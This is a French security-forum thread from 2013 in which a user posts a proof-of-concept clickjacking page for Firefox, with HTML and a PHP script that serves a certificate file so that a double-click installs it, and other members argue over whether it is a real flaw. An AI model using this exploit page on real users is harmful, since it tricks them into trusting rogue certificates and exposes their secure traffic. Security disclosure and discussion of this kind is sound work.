• STATISTIQUES
  • Il y a eu un total de 1 membres et 4506 visiteurs sur le site dans les dernières 24h pour un total de 4 507 personnes!


    1 membre s'est inscrit dans les dernières 24h!


    Membres: 2 606
    Discussions: 3 580
    Messages: 32 820
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] CS Tutoring Center
    Site de challenge spécialisé dans les challenges de programmation C++ et java cependant, d'autres langages pe...
    Challenges
    [FR] Le top web
    Nous offrons une sélection la plus large possible de resources webmaster gratuites, hébergement gratuit...
    Webmaster
    [FR] Zmaster
    Articles sur l'informatique, le hacking, le P2P, les divx, les astuces windows XP, les GSM, Emule, la cryptograph...
    Hacking
    [FR] Zenk-Security
    La communauté zenk-security a pour objet principal la sécurité informatique, nous sommes des tou...
    Hacking
    [EN] wechall
    Pour les gens n'étant pas familiers avec les sites de challenges, un site de challenges est un site propos...
    Hacking
    [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [EN] This is legal
    Basic: 10, Realistic: 5, Programming: 1, Bonus: 11, SQL: 2, Encryption: 6, Application: 4, User Contributed: 3
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Mozilla Firefox Install malicious certificate clickjacking
01-09-2013, 13h49 (Modification du message : 01-09-2013, 13h49 par j0-c.)
Message : #1
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
Mozilla Firefox Install malicious certificate clickjacking
Video youtube du PoC en action =>

Voila je poste ici une petite vulnérabilité que j'ai dèja signalé sur bugzilla.mozilla.org unpeu plus importante que la dernière, celle ci permet d'installé un certificat SSL et donc même si celui ci est factice ou obsolète, il permet de visiter des site web sécurisé via le même type de certificat.

Le clickjacking consiste a double cliquer sur un lien , au premier clique une boite d'installation de certificat apparaitra et au deuxième clique le certificat sera installé.


Pour l'instant je poste juste des petites failles pour tester la fiabilité du forum , voir si il n'y a pas de personne qui publie ceci à leur nom sur divers autres sites mais si la confiance se fait je vais alors pouvoir vous donner d'avantage de vulnérabilité beaucoup plus importante .
Code PHP :
<!doctype html>
<
html lang="fr">
<
head>
    <
meta charset="utf-8">
    <
title>0day</title>
    <
style media="screen">

    
/* IMPORTANT */
    
html {
        
height100%;
    }
    
body {
        
height100%;
        
margin0;
        
padding0;
    }
    
#page-table {
        
height100%;
        
width100%;
        
border-collapsecollapse;
        
text-aligncenter;
    }
    
#page-td {
        
height100%;
        
padding0;
        
vertical-alignmiddle;
    }
    
div#global {
        
width500px;
        
margin20px auto;
        
text-alignleft;
    }

    
/* COSM�TIQUE */
    
body {
        
backgroundblack;
    }
    
#page-table {
        
backgroundblack;
        
colorwhite;
    }
    
#page-table a {color: white;}
    
div#global {
        
padding10px 20px;
        
backgroundblack;
        
border1px solid black;
        
font-familyArialHelveticasans-serif;
    }


    </
style>
</
head>

<
body>
<
div id="layer1" style="width:442px; height:200px; position:absolute; left:10px; top:56px; z-index:1;">
    <
p><font color="lime">0day exploit double-click-jacking install malicious 
    SSL Certificate
</font></p>
</
div>
<
table id="page-table"><tr><td id="page-td">

<
div id="global">
<
table style="border-collapse:collapse;" cellspacing="0" width="424">
            <
tr>
                <
td width="150" height="119" style="border-width:0; border-color:black; border-style:solid;">
                    <
p>&nbsp;</p>
                </
td>
            </
tr>
            <
tr>
                <
td width="150" height="23" style="border-width:0; border-color:black; border-style:solid;">
                    <
p align="right"><a onmousedown="document.location='./156.php';" href="#"><span style="font-size:8pt;">doubleclickme</span></a></td>
            </
tr>
        </
table>
</
div><!--#global-->

</td></tr></table><!--#page-table-->

</body>
</
html

---
156.php
Code PHP :
<?php
Header
("Content-type: application/x-x509-ca-cert"); //no comment
Header("Content-Disposition: inline; filename=turktrust-intermediate-2.pem"); 
readfile("turktrust-intermediate-2.pem"); 
?>

---
turktrust-intermediate-2.pem
certificate : http://alternativ-testing.fr/Research/Mo...iate-2.pem


Live PoC : http://alternativ-testing.fr/Research/Mo...icate2.htm#
+1 (0) -1 (0) Répondre
01-09-2013, 13h54
Message : #2
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: Mozilla Firefox Install malicious certificate clickjacking
déplacé dans la catégorie Security
+1 (0) -1 (0) Répondre
01-09-2013, 14h00
Message : #3
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
okay désolé pour le dérangement.
+1 (0) -1 (0) Répondre
01-09-2013, 14h03 (Modification du message : 01-09-2013, 14h06 par InstinctHack.)
Message : #4
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Mozilla Firefox Install malicious certificate clickjacking
Salut,

test sous Firefox 23.0 Linux.
Déjà faut javascript d'activé, c'est pas mon cas :] mais un lien html normal aura le meme effet.
L'effet de produire le résultat attendu par les dev :
un clic : affichage de la boite de dialogue.
double-clic : affichage de la boite de dialogue.
Et rien de plus dans les certificats.
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (1) -1 (0) Répondre
01-09-2013, 14h08 (Modification du message : 01-09-2013, 14h20 par j0-c.)
Message : #5
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
essais sous windows 7 j'ai pas testé sur mon ubuntu

Je sais que ce que je reporte est valide puisqu'il a été confirmé par l'équipe de programmeur de mozilla.

Normalement l'endroit ou tu double clique est placer au même endroit que le bouton d'installation du certificat dans la boite d'installation qui est apparut.

sous windows 7 c'est bien le cas si tu as ta barre personnelle d'onglet activé.
+1 (0) -1 (0) Répondre
01-09-2013, 14h25
Message : #6
Polo Hors ligne
Benêt en chef
*



Messages : 110
Sujets : 4
Points: 25
Inscription : Mar 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
Haha pas de bol, chez moi (Arch et FF 23.0) ça tombe pile poil en face du bouton Cancel :')
+1 (0) -1 (0) Répondre
01-09-2013, 14h27
Message : #7
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
le code source est libre a toi de changer ce qui ne va pas pour que sa marche chez toi Wink
+1 (0) -1 (0) Répondre
01-09-2013, 14h38 (Modification du message : 01-09-2013, 18h46 par InstinctHack.)
Message : #8
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Mozilla Firefox Install malicious certificate clickjacking
Il n'en reste pas moins que c'est pas réellement une faille. Humaine peut-être.
On double-clic pas sur un lien dans un navigateur. (si ? :O )

Et tu dis que la faille as était validé par l'équipe de dévellopeur. Ok.
Ils vont faire quoi pour la "corriger" ? Mettre un timeout ?

Ca reste un problème humain à mes yeux. Si je me trompe dites-le moi Wink
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (1) -1 (0) Répondre
01-09-2013, 14h52
Message : #9
ark Hors ligne
Psyckomodo!
*****



Messages : 1,033
Sujets : 48
Points: 317
Inscription : Sep 2011
RE: Mozilla Firefox Install malicious certificate clickjacking
(01-09-2013, 14h38)InstinctHack a écrit : On double-clic pas sur un clic dans un navigateur. (si ? :O )

Je t'assure que Mme Michu elle sait jamais quand il faut cliquer ou double cliquer, du coup elle double clique partout.
+1 (2) -1 (0) Répondre
01-09-2013, 15h05
Message : #10
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
(01-09-2013, 14h38)InstinctHack a écrit : Il n'en reste pas moins que c'est pas réellement une faille. Humaine peut-être.
On double-clic pas sur un clic dans un navigateur. (si ? :O )

biensure que si il y a même des "event" en javascript pour gérer les double clique.

le double clique se veut une action courante.
+1 (0) -1 (0) Répondre
01-09-2013, 15h34
Message : #11
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: Mozilla Firefox Install malicious certificate clickjacking
l'un dans l'autre disons qu'un post taggé "vuln dans ffox" et qui explique finalement juste une technique utilisée par les pirates sans expliquer d'où elle vient ni comment elle fonctionne, perso ça m'excite pas plus que ça je dois avouer

en terme de confiance je pense pas que les gens d'ici soient de ce genre à faire de la récup en mettant leur nom dessus, sinon dans tous les cas quel intérêt de venir poster sur un forum comme celui-ci ?
n-pn se veut plus orienté "compréhension" que "divulgation", c'est tout le propos de l'orientation "white-hat" n'est-ce pas...

de fait n-pn n'est pas un clone de exploitdb, en revanche si tu te sens de nous faire un tuto sur le heap-spraying, l'architecture de sécurité de firefox ou la sécurité des plugins depuis leur upload sur addons.mozilla jusqu'à l'installation par l'utilisateur etc. ça serait clairement bienvenu
je le répète, je m'interroge sur ta démarche qui, en tant que professionnel, est assez peu orthodoxe...
+1 (5) -1 (0) Répondre
01-09-2013, 15h42 (Modification du message : 01-09-2013, 15h51 par j0-c.)
Message : #12
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
biensure que si j'ai expliquer comment celle ci fonctionne même si j'ai été bref.

ma démarche est simple : partager de temps en temps le fruit de mes recherches ensuite même sans trop développer dessus du moment qu'on a le code je pense qu'on peut se débrouiller.

c'est bete de me décourager a se stade alors que j'en ai d'autres sous le bras nettement plus interessantes que je comptait peutetre poster ici.
+1 (1) -1 (0) Répondre
01-09-2013, 15h52
Message : #13
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Mozilla Firefox Install malicious certificate clickjacking
@j0-c
Quelques remarques personnelles.
Le forum compte 470 membres validés, dans le lot il y as surement quelques idiots qui vont essayer de se valoriser à yeux d'autres avec ce que tu poste. Mais c'est partout pareil, un script-kiddie qui trouve un beug encore actif sur bugzilla peut l'utiliser. Si tu veut vraiment empecher ça, ne poste null part.

Et même si les deux trucs que tu as postés reste à mes yeux des beugs plutôt que des failles, ils sont intéressants à lire. Il manque peut-être un peu d'explication comme l'as dit gruik, mais je pense aussi qu'ayant le code (et qu'il soit court de plus...) permet à chacun de faire le cheminement logique pour comprendre comment cela fonctionne. Smile
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
02-09-2013, 11h06 (Modification du message : 02-09-2013, 11h08 par j0-c.)
Message : #14
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
RE: Mozilla Firefox Install malicious certificate clickjacking
(01-09-2013, 15h34)gruik a écrit : l'un dans l'autre disons qu'un post taggé "vuln dans ffox" et qui explique finalement juste une technique utilisée par les pirates sans expliquer d'où elle vient ni comment elle fonctionne
(01-09-2013, 15h52)InstinctHack a écrit : Et même si les deux trucs que tu as postés reste à mes yeux des beugs plutôt que des failles

Ce n'est pas une technique ni un simple bug mais une vulnérabilité a part entière qui nécéssite une certaine interaction . quand le code source laisse place a des interaction malveillante pour l'utilisateur on appel sa une vulnérabilité.
Elle vien d'ou? de mes recherche biensure.
Elle marche comment? je l'ai déja expliqué
+1 (0) -1 (0) Répondre
02-09-2013, 12h46
Message : #15
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: Mozilla Firefox Install malicious certificate clickjacking
d'ac merci pour ces précisions.
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  firefox >= 24 & TLS 1.2 gruik 6 369 07-02-2014, 00h19
Dernier message: Serphentas
  Mozilla Firefox low spoofing possible url spoofing with copy , past and go of a link j0-c 8 519 01-09-2013, 13h54
Dernier message: gruik

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut